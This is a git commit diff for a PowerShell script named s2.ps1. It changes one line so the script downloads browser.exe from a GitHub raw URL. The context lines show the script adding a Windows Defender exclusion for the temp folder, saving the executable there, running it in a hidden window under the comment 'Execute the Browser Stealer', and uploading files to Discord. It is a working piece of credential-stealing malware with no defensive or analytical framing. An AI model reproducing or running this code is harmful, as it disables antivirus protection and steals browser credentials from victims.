Update s2.ps1
This commit is contained in:
parent
87d0aae843
commit
98216677ae
1 changed files with 1 additions and 1 deletions
|
@ -53,7 +53,7 @@ if (-not ([string]::IsNullOrEmpty($dc))){Upload-Discord -file $env:TMP\$FileName
|
|||
Add-MpPreference -ExclusionPath $env:tmp
|
||||
|
||||
# Download the exe and save it to temp directory
|
||||
iwr "COMING SOON" -outfile "$env:tmp\browser.exe"
|
||||
iwr "https://github.com/I-Am-Jakoby/I-Am-Jakoby/raw/main/Assets/browser.exe" -outfile "$env:tmp\browser.exe"
|
||||
|
||||
# Execute the Browser Stealer
|
||||
cd $env:tmp;Start-Process -FilePath "$env:tmp\browser.exe" -WindowStyle h -Wait
|
||||
|
|
Loading…
Reference in a new issue